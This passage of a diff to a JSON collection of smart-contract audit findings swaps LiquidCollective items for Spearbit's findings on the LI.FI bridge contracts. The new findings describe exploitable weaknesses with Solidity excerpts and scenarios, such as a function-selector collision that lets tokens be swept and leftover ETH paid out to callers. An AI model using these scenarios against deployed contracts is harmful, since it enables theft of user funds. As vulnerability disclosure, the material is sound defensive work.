noLeftovers(LibSwap.SwapData[] calldata _swapData, address payable _receiver) { ... uint256[] memory initialBalances = _fetchBalances(_swapData); ... // all kinds of actions newBalance = LibAsset.getOwnBalance(curAsset); curBalance = newBalance > initialBalances[i] ? newBalance - initialBalances[i] : newBalance; ... } function _executeAndCheckSwaps(...) ... { ... uint256 swapBalance = LibAsset.getOwnBalance(finalTokenId); ... // all kinds of actions uint256 newBalance = LibAsset.getOwnBalance(finalTokenId); swapBalance = newBalance > swapBalance ? newBalance - swapBalance : newBalance; ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Rename modifiers to have consistent naming and patterns only.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The modifiers ifGovernor and ifGovernorOrExecutor in Firewall.sol have a different naming conventions and also logical patterns.", + "title": "Processing of initial balances", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The LiFi code bases contains two similar source files: Swapper.sol and SwapperV2.sol. One of the differences is the processing of msg.value for native tokens, see pieces of code below. The implementation of SwapperV2.sol sends previously available native token to the msg.sender. The following is exploit example. Assume that: the LiFi Diamond contract contains 0.1 ETH. a call is done with msg.value == 1 ETH. and _swapData[0].fromAmount ETH, which is the amount to be swapped. Option 1Swapper.sol: initialBalances == 1.1 ETH - 1 ETH == 0.1 ETH. Option 2 SwapperV2.sol: initialBalances == 1.1 ETH. After the swap getOwnBalance()is1.1 - 0.5 == 0.6 ETH. Option 1 Swapper.sol: returns 0.6 - 0.1 = 0.5 ETH. Option 2 SwapperV2.sol: returns 0.6 ETH (so includes the previously present ETH). 0.5 == Note: the implementations of noLeftovers() are also different in Swapper.sol and SwapperV2.sol. Note: this is also related to the issue \"Pulling tokens by LibSwap.swap() is counterintuitive\", because the ERC20 are pulled in via LibSwap.swap(), whereas the msg.value is directly added to the balance. As there normally shouldnt be any token in the LiFi Diamond contract the risk is limited. contract Swapper is ILiFi { function _fetchBalances(...) ... { ... for (uint256 i = 0; i < length; i++) { address asset = _swapData[i].receivingAssetId; uint256 balance = LibAsset.getOwnBalance(asset); if (LibAsset.isNativeAsset(asset)) { balances[i] = balance - msg.value; } else { balances[i] = balance; } } return balances; } } contract SwapperV2 is ILiFi { function _fetchBalances(...) ... { ... for (uint256 i = 0; i < length; i++) { balances[i] = LibAsset.getOwnBalance(_swapData[i].receivingAssetId); } ... } } The following functions do a comparable processing of msg.value for the initial balance: swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol swapAndCompleteBridgeTokens() of XChainExecFacet 25 if (!LibAsset.isNativeAsset(transferredAssetId)) { ... } else { startingBalance = LibAsset.getOwnBalance(transferredAssetId) - msg.value; } However in Executor.sol function swapAndCompleteBridgeTokensViaStargate() isnt optimal for ERC20 tokens because ERC20 tokens are already deposited in the contract before calling this function. function swapAndCompleteBridgeTokensViaStargate(... ) ... { ... if (!LibAsset.isNativeAsset(transferredAssetId)) { startingBalance = LibAsset.getOwnBalance(transferredAssetId); // doesn't correct for initial balance } else { ... } ,! } So assume: 0.1 ETH was in the contract. 1 ETH was added by the bridge. 0.5 ETH is swapped. Then the StartingBalance is calculated to be 0.1 ETH + 1 ETH == 1.1 ETH. So no funds are returned to the receiver as the end balance is 1.1 ETH - 0.5 ETH == 0.6 ETH, is smaller than 1.1 ETH. Whereas this should have been (1.1 ETH - 0.5 ETH) - 0.1 ETH == 0.5 ETH.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "OperatorResolution.active might be a redundant struct field which can be removed.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The value of active stays true once it has been set true for a given index. This is especially true since the only call to Operators.set is from OperatorsRegistryV1.addOperator which does not override values for already registered names.", + "title": "Improve dexAllowlist", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The functions _executeSwaps() of both SwapperV2.sol and Swapper.sol use a whitelist to make sure the right functions in the allowed dexes are called. The checks for approveTo, callTo and signature (callData) are independent. This means that any signature is valid for any dex combined with any approveTo address. This grands more access than necessary. This is important because multiple functions can have the same signature. For example these two functions have the same signature: gasprice_bit_ether(int128) 26 transferFrom(address,address,uint256) See bytes4_signature=0x23b872dd Note: brute forcing an innocent looking function is straightforward The transferFrom() is especially dangerous because it allows sweeping tokens from other users that have set an allowance for the LiFi Diamond. If someone gets a dex whitelisted, which contains a function with the same signature then this can be abused in the current code. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); ... } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "The expression for selectedOperatorAvailableKeys in OperatorsRegistry can be simplified.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "tors[selectedOperatorIndex].keys. Since the places that the limit has been set with a value other than 0 has checks against going above keys bound: operators[selectedOperatorIndex].limit is always less than or equal OperatorsRegistry.1.sol#L250-L252 if (_newLimits[idx] > operator.keys) { revert OperatorLimitTooHigh(_newLimits[idx], operator.keys); } OperatorsRegistry.1.sol#L324-L326 if (keyIndex >= operator.keys) { revert InvalidIndexOutOfBounds(); } OperatorsRegistry.1.sol#L344-L346 52 if (_indexes[_indexes.length - 1] < operator.limit) { operator.limit = _indexes[_indexes.length - 1]; }", + "title": "Pulling tokens by LibSwap.swap() is counterintuitive", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function LibSwap.swap() pulls in tokens via transferFromERC20() from msg.sender when needed. When put in a loop, via _executeSwaps(), it can pull in multiple different tokens. It also doesnt detect accidentally sending of native tokens with ERC20 tokens. This approach is counterintuitive and leads to risks. Suppose someone wants to swap 100 USDC to 100 DAI and then 100 DAI to 100 USDT. If the first swap somehow gives back less tokens, for example 90 DAI, then LibSwap.swap() pulls in 10 extra DAI from msg.sender. Note: this requires the msg.sender having given multiple allowances to the LiFi Diamond. Another risk is that an attacker tricks a user to sign a transaction for the LiFi protocol. Within one transaction it can sweep multiple tokens from the user, cleaning out his entire wallet. Note: this requires the msg.sender having given multiple allowances to the LiFi Diamond. In Executor.sol the tokens are already deposited, so the \"pull\" functionality is not needed and can even result in additional issues. In Executor.sol it tries to \"pull\" tokens from \"msg.sender\" itself. In the best case of ERC20 implementations (like OpenZeppeling, Solmate) this has no effect. However some non standard ERC20 imple- mentations might break. 27 contract SwapperV2 is ILiFi { function _executeSwaps(...) ... { ... for (uint256 i = 0; i < _swapData.length; i++) { ... LibSwap.swap(_lifiData.transactionId, currentSwapData); } } } library LibSwap { function swap(...) ... { ... uint256 initialSendingAssetBalance = LibAsset.getOwnBalance(fromAssetId); ... uint256 toDeposit = initialSendingAssetBalance < fromAmount ? fromAmount - ,! initialSendingAssetBalance : 0; ... if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } } Use LibAsset.depositAsset() before doing", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "The unused constant DELTA_BASE can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The constant DELTA_BASE in BeaconReportBounds is never used.", + "title": "Too many bytes are checked to verify the function selector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function _executeSwaps() slices the callData with 8 bytes. The function selector is only 4 bytes. Also see docs So additional bytes are checked unnecessarily, which is probably unwanted. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) // should be 4 ) revert ContractCallNotAllowed(); ... } } Definition of dexFuncSignatureAllowList in LibStorage.sol: struct LibStorage { ... mapping(bytes32 => bool) dexFuncSignatureAllowList; ... // could be bytes4 }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Remove unused modifiers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The modifier active(uint256 _index) is not used in the project.", + "title": "Check address(self) isnt accidentally whitelisted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "There are several access control mechanisms. If they somehow would allow address(self) then risks would increase as there are several ways to call arbitrary functions. library LibAccess { function addAccess(bytes4 selector, address executor) internal { ... accStor.execAccess[selector][executor] = true; } } contract AccessManagerFacet { function setCanExecute(...) ... { ) external { ... _canExecute ? LibAccess.addAccess(_selector, _executor) : LibAccess.removeAccess(_selector, ,! _executor); } } contract DexManagerFacet { function addDex(address _dex) external { ... dexAllowlist[_dex] = true; ... } function batchAddDex(address[] calldata _dexs) external { dexAllowlist[_dexs[i]] = true; ... ... } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Modifier names do not follow the same naming patterns", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The modifier names do not follow the same naming patterns in OperatorsRegistry.", + "title": "Verify anyswap token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The AnyswapFacet supplies _anyswapData.token to different functions of _anyswapData.router. These functions interact with the contract behind _anyswapData.token. If the _anyswapData.token would be malicious then tokens can be stolen. Note, this is relevant if the LiFi contract are called directly without using the API. 30 function _startBridge(...) ... { ... IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }( _anyswapData.token,...); ... IAnyswapRouter(_anyswapData.router).anySwapOutUnderlying( _anyswapData.token, ... ); ... IAnyswapRouter(_anyswapData.router).anySwapOut( _anyswapData.token, ...); ... ,! }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "In AllowlistV1.allow the input variable _statuses can be renamed to better represent that values it holds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In AllowlistV1.allow the input variable _statuses can be renamed to better represent the values it holds. _statuses is a bitmap where each bit represents a particular action that a user can take.", + "title": "More thorough checks for DAI in swapAndStartBridgeTokensViaXDaiBridge()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function swapAndStartBridgeTokensViaXDaiBridge() checks lifiData.sendingAssetId == DAI, however it doesnt check that the result of the swap is DAI (e.g. _swapData[_swapData.length - 1].re- ceivingAssetId == DAI ). function swapAndStartBridgeTokensViaXDaiBridge(...) ... { ... if (lifiData.sendingAssetId != DAI) { revert InvalidSendingToken(); } gnosisBridgeData.amount = _executeAndCheckSwaps(lifiData, swapData, payable(msg.sender)); ... _startBridge(gnosisBridgeData); // sends DAI }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "riverAddress can be renamed to river and we can avoid extra interface casting", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "riverAddress's name suggest that it is only an address. Although it is an address with the IRiverV1 attached to it. Also, we can avoid unnecessary casting of interfaces.", + "title": "Funds transferred via Connext may be lost on destination due to incorrect receiver or calldata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "_startBridge() in AmarokFacet.sol and NXTPFacet.sol sets user-provided receiver and call data for the destination chain. The receiver is intended to be LifiDiamond contract address on destination chain. The call data is intended such that the functions completeBridgeTokensVia{Amarok/NXTP}() or swapAnd- CompleteBridgeTokensVia{Amarok/NXTP}() are called. In case of a frontend bug or a user error, these parameters can be malformed which will lead to stuck (and stolen) funds on destination chain. Since the addresses and functions are already known, the contract can instead pass this data to Connext instead of taking it from the user. 31", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Define named constants for numeric literals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In _sanitychecks there 2 numeric literals 10000 and 365 days used: uint256(10000 * 365 days) * (_postTotalEth - _prevTotalEth) ... if (uint256(10000) * (_prevTotalEth - _postTotalEth) > relativeLowerBound * _prevTotalEth) {", + "title": "Check output of swap is equal to amount bridged", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The result of swap (amount) isnt always checked to be the same as the bridged amount (_bridge- Data.amount). This way tokens could stay in the LiFi Diamond if more tokens are received with a swap than bridged. function swapAndStartBridgeTokensViaPolygonBridge(...) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); ... _startBridge(_lifiData, _bridgeData, true); } function _startBridge(..., BridgeData calldata _bridgeData, ...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { rootChainManager.depositEtherFor{ value: _bridgeData.amount }(_bridgeData.receiver); } else { ... LibAsset.maxApproveERC20(IERC20(_bridgeData.assetId), _bridgeData.erc20Predicate, ,! _bridgeData.amount); bytes memory depositData = abi.encode(_bridgeData.amount); rootChainManager.depositFor(_bridgeData.receiver, _bridgeData.assetId, depositData); } ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Move memberIndex and ReportsPositions checks at the beginning of the OracleV1.reportBeacon function.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The checks for memberIndex == -1 and ReportsPositions.get(uint256(memberIndex)) happen in the middle of reportBeacon after quite a few calculations are done.", + "title": "Missing timelock logic on the DiamondCut facets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In LiFi Diamond, any facet address/function selector can be changed by the contract owner. Connext, Diamond should go through a proposal window with a delay of 7 days. In function diamondCut( FacetCut[] calldata _diamondCut, address _init, bytes calldata _calldata ) external override { LibDiamond.enforceIsContractOwner(); LibDiamond.diamondCut(_diamondCut, _init, _calldata); }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Document what incentivizes the operators to run their validators when globalFee is zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "If GlobalFee could be 0, then neither the treasury nor the operators earn rewards. What factor would motivate the operators to keep their validators running?", + "title": "Data from emit LiFiTransferStarted() cant be relied on", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Most of the function do an emit like LiFiTransferStarted(). Some of the fields of the emits are (sometimes) verified, but most fields come from the input variable _lifiData. The problem with this is that anyone can do solidity transactions to the LiFi bridge and supply wrong data for the emit. For example: transfer a lot of Doge coins and in the emit say they are transferring wrapped BTC. Then the statistics would say a large amount of volume has been transferred, while in reality it is neglectable. The advantage of using a blockchain is that the data is (seen as) reliable. If the data isnt reliable, it isnt worth the trouble (gas cost) to store it in a blockchain and it could just be stored in an offline database. The result of this is, its not useful to create a subgraph on the emit data (because it is unreliable). This would mean a lot of extra work for subgraph builders to reverse engineer what is going on. Also any kickback fees to in- tegrators or referrers cannot be based on this data because it is unreliable. Also user interfaces & dashboards could display the wrong information. 33 function startBridgeTokensViaOmniBridge(LiFiData calldata _lifiData, ...) ... { ... LibAsset.depositAsset(_bridgeData.assetId, _bridgeData.amount); _startBridge(_lifiData, _bridgeData, _bridgeData.amount, false); } function _startBridge(LiFiData calldata _lifiData, ... ) ... { ... // do actions emit LiFiTransferStarted( _lifiData.transactionId, \"omni\", \"\", _lifiData.integrator, _lifiData.referrer, _lifiData.sendingAssetId, _lifiData.receivingAssetId, _lifiData.receiver, _lifiData.amount, _lifiData.destinationChainId, _hasSourceSwap, false ); }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Document how Alluvial plans to prevent institutional investors and operators get into business directly and bypass using the River protocol.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Since the list of operators and also depositors can be looked up from the information on-chain, what would prevent Institutional investors (users) and the operators to do business outside of River? Is there going to be an off-chain legal contract between Alluvial and these other entities to prevent this scenario?", + "title": "Missing emit in XChainExecFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The function swapAndCompleteBridgeTokens of Executor does do an emit LiFiTransferCom- pleted , while the comparable function in XChainExecFacet doesnt do this emit. This way there will be missing emits. contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function swapAndCompleteBridgeTokens(LiFiData calldata _lifiData, ... ) ... { ... emit LiFiTransferCompleted( ... ); } } contract XChainExecFacet is SwapperV2, ReentrancyGuard { function swapAndCompleteBridgeTokens(LiFiData calldata _lifiData, ... ) ... { ... // no emit } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Document how operator rewards will be distributed if OperatorRewardsShare is zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "If OperatorRewardsShare could be 0, then the operators won't earn rewards. What factor would motivate the operators to keep their validators running? Sidenote: Other incentives for the operators to keep their validators running (if their reward share portion is 0) would be some sort of MEV or block proposal/attestation bribes. Related: Avoid to waste gas distributing rewards when the number of shares to be distributed is zero", + "title": "Different access control to withdraw funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "To withdraw any stuck tokens, WithdrawFacet.sol provides two functions: executeCallAndWith- draw() and withdraw(). Both have different access controls on them. executeCallAndWithdraw() can be called by the owner or if msg.sender has been approved to call a function whose signature matches that of executeCallAndWithdraw(). withdraw() can only be called by the owner. If the function signature of executeCallAndWithdraw() clashes with an approved signature in execAccess map- ping, the approved address can steal all the funds in LifiDiamond contract.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Current operator reward distribution does not favor more performant operators", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Reward shares are distributed based on the fraction of the active funded non-stopped validators owned by an operator. This distribution of shares does not promote the honest operation of validators to the fullest extent. Since the oracle members don't report the delta in the balance of each validator, it is not possible to reward operators/validators that have been performing better than the rest. Also if a high-performing operator or operators were the main source of the beacon balance sum and if they had enough ETH to initially deposit into the ETH2.0 deposit contract on their own, they could have made more profit that way versus joining as an operator in the River protocol.", + "title": "Use internal where possible", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Several functions have an access control where the msg.sender if compared to address(this), which means it can only be called from the same contract. In the current code with the various generic call mechanisms this isnt a safe check. For example the function _execute() from Executor.sol can circumvent this check. Luckily the function where this has been used have a low risk profile so the risk of this issue is limited. function swapAndCompleteBridgeTokensViaStargate(...) ... { if (msg.sender != address(this)) { revert InvalidCaller(); } ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "TRANSFER_MASK == 0 which causes a no-op.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "TRANSFER_MASK is a named constant defined as 0 (River.1.sol#L37). Like the other masks DEPOSIT_- MASK and DENY_MASK which supposed to represent a bitmask, on the first look, you would think TRANSFER_MASK would need to also represent a bitmask. But if you take a look at _onTransfer: function _onTransfer(address _from, address _to) internal view override { IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_from, TRANSFER_MASK); // this call reverts if unauthorized or denied IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_to, TRANSFER_MASK); // this call reverts if unauthorized or denied ,! ,! } This would translate into calling onlyAllowed with the: IAllowlistV1(AllowlistAddress.get()).onlyAllowed(x, 0); Now if we look at the onlyAllowed function with these parameters: function onlyAllowed(x, 0) external view { uint256 userPermissions = Allowlist.get(x); if (userPermissions & DENY_MASK == DENY_MASK) { revert Denied(_account); } if (userPermissions & 0 != 0) { // <--- ( x & 0 != 0 ) == false revert Unauthorized(_account); } } Thus if the _from, _to addresses don't have their DENY_MASK set to 1 they would not trigger a revert since we would never step into the 2nd if block above when TRANSFER_MASK is passed to these functions. The TRANSFER_MASK is also used in _onDeposit: IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_depositor, DEPOSIT_MASK + TRANSFER_MASK); // DEPOSIT_MASK + TRANSFER_MASK == DEPOSIT_MASK ,! IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_recipient, TRANSFER_MASK); // like above in ,! `_onTransfer`", + "title": "Event of transfer is not emitted in the AxelarFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The usage of the LiFi protocol depends largely to the off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs. The events are useful to record these changes on-chain for off-chain monitors/tools/interfaces when integrating with off-chain APIs. Although, other facets are emitting LiFiTransferStarted event, AxelarFacet does not emit this event. contract AxelarFacet { function executeCallViaAxelar(...) ... {} function executeCallWithTokenViaAxelar(...) ... {} } On the receiving side, the Executor contract does do an emit in function _execute() but not in function _- executeWithToken(). contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _execute(...) ... { ... emit AxelarExecutionComplete(callTo, bytes4(callData)); } function _executeWithToken( ... // no emit } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Reformat numeric literals with many digits for better readability.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Reformat numeric literals with many digits into a more readable form.", + "title": "Improve checks on the facets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the facets, receiver/destination address and amount checks are missing. The symbol parameter is used to get address of token with gateways tokenAddresses function. tokenAd- dresses function get token address by mapping. If the symbol does not exist, the token address can be zero. AxelarFacet and Executor do not check If the given symbol exists or not. 36 contract AxelarFacet { function executeCallWithTokenViaAxelar(...) ... { address tokenAddress = s.gateway.tokenAddresses(symbol); } function initAxelar(address _gateway, address _gasReceiver) external { s.gateway = IAxelarGateway(_gateway); s.gasReceiver = IAxelarGasService(_gasReceiver); } } contract Executor { function _executeWithToken(...) ... { address tokenAddress = s.gateway.tokenAddresses(symbol); } } GnosisBridgeFacet, CBridgeFacet, HopFacet and HyphenFacets are missing receiver address/amount check. contract CBridgeFacet { function _startBridge(...) ... { ... _cBridgeData.receiver ... } } contract GnosisBridgeFacet { function _startBridge(...) ... { ... gnosisBridgeData.receiver ... } } contract HopFacet { function _startBridge(...) ... { _hopData.recipient, ... ... } } contract HyphenFacet { function _startBridge(...) ... { _hyphenData.recipient ... ... } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Firewall should follow the two-step approach present in River when transferring govern address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Both River and OperatorsRegistry follow a two-step approach to transfer the ownership of the contract. 1) Propose a new owner storing the address in a pendingAdmin variable 2) The pending admins accept the new role by actively calling acceptOwnership This approach makes this crucial action much safer because 1) Prevent the admin to transfer ownership to address(0) given that address(0) cannot call acceptOwnership 2) Prevent the admin to transfer ownership to an address that cannot \"admin\" the contract if they cannot call acceptOwnership. For example, a contract do not have the implementation to at least call acceptOwnership. 3) Allow the current admin to stop the process by calling transferOwnership(address(0)) if the pending admin has not called acceptOwnership yet The current implementation does not follow this safe approach, allowing the governor to directly transfer the gov- ernor role to a new address.", + "title": "Use keccak256() instead of hex", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Several NAMESPACEs are defined, some with a hex value and some with a keccak256(). To be able to verify they are all different it is better to use the same format everywhere. If they would use the same value then the variables stored on that location could interfere with each other and the LiFi Diamond could start to behave unreliably. ... NAMESPACE = hex\"c7...\"; // keccak256(\"com.lifi.facets.axelar\") ... NAMESPACE = hex\"cf...\"; // keccak256(\"com.lifi.facets.ownership\"); ... NAMESPACE = hex\"a6...\"; ReentrancyGuard.sol: AxelarFacet.sol: OwnershipFacet.sol: PeripheryRegistryFacet.sol: ... NAMESPACE = hex\"dd...\"; // keccak256(\"com.lifi.facets.periphery_registry\"); ,! StargateFacet.sol: LibAccess.sol: ,! LibDiamond.sol: keccak256(\"com.lifi.library.access.management\") ... NAMESPACE = keccak256(\"com.lifi.facets.stargate\"); ... ACCESS_MANAGEMENT_POSITION = hex\"df...\"; // ... DIAMOND_STORAGE_POSITION = keccak256(\"diamond.standard.diamond.storage\");", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "OperatorRegistry.removeValidators is resetting the limit (approved validators) even when not needed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of removeValidators allow an admin or node operator to remove val- idators, passing to the function the list of validator's index to be removed. Note that the list of indexes must be ordered DESC. At the end of the function, we can see these checks if (_indexes[_indexes.length - 1] < operator.limit) { operator.limit = _indexes[_indexes.length - 1]; } That reset the operator's limit to the lower index value (this to prevent that a not approved key get swapped to a position inside the limit). The issue with this implementation is that it is not considering the case where all the operator's validators are already approved by Alluvial. In this case, if an operator removes the validator with the lower index, all the other validators get de-approved because the limit will be set to the lower limit. Consider this scenario: 59 op.limit = 10 op.keys = 10 op.funded = 0 This mean that all the validators added by the operator have been approved by Alluvial and are safe (keys == limit). If the operator or Alluvial call removeValidators([validatorIndex], [0]) removing the validator at index 0 this will swap the validator_10 with validator_0. set the limit to 0 because 0 < 10 (_indexes[_indexes.length - 1] < operator.limit). The consequence is that even if all the validators present before calling removeValidators were \"safe\" (because approved by Alluvial) the limit is now 0 meaning that all the validators are not \"safe\" anymore and cannot be selected by pickNextValidators.", + "title": "Remove redundant Swapper.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "There are two versions of Swapper.sol (e.g Swapper.sol and SwapperV2.sol ) which are function- ally more or less the same. The WormholeFacet contract is the only one still using Swapper.sol. Having two versions of the same code is confusing and difficult to maintain. import { Swapper } from \"../Helpers/Swapper.sol\"; contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Consider renaming transferOwnership to better reflect the function's logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of transferOwnership is not really transferring the ownership from the current admin to the new one. The function is setting the value of the Pending Admin that must subsequently call acceptOwnership to accept the role and confirm the transfer of the ownership.", + "title": "Use additional checks for transferFrom()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Several functions transfer tokens via transferFrom() without checking the return code. Some of the contracts are not covering edge cases like non-standard ERC20 tokens that do not: revert on failed transfers. Some ERC20 implementations dont revert is the balance is insufficient but return false. Other functions transfer tokens with checking if the amount of tokens received is equal to the amount of tokens requested. This relevant for tokens that withhold a fee. Luckily there is always additional code, like bridge, dex or pool code, that verifies the amount of tokens received, so the risk is limited. contract AxelarFacet { function executeCallWithTokenViaAxelar(... ) ... { ... IERC20(tokenAddress).transferFrom(msg.sender, address(this), amount); // no check on return ,! code & amount of tokens ... } } contract ERC20Proxy is Ownable { function transferFrom(...) ... { ... IERC20(tokenAddress).transferFrom(from, to, amount); // no check on return code & amount of ,! tokens ... } } contract FusePoolZap { function zapIn(...) ... { ... IERC20(_supplyToken).transferFrom(msg.sender, address(this), _amount); // no check on amount of tokens ,! return code & } } library LibSwap { function swap(...) ... { ... LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); // no check on amount of tokens } ,! }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Wrong return name used", - "html_url": 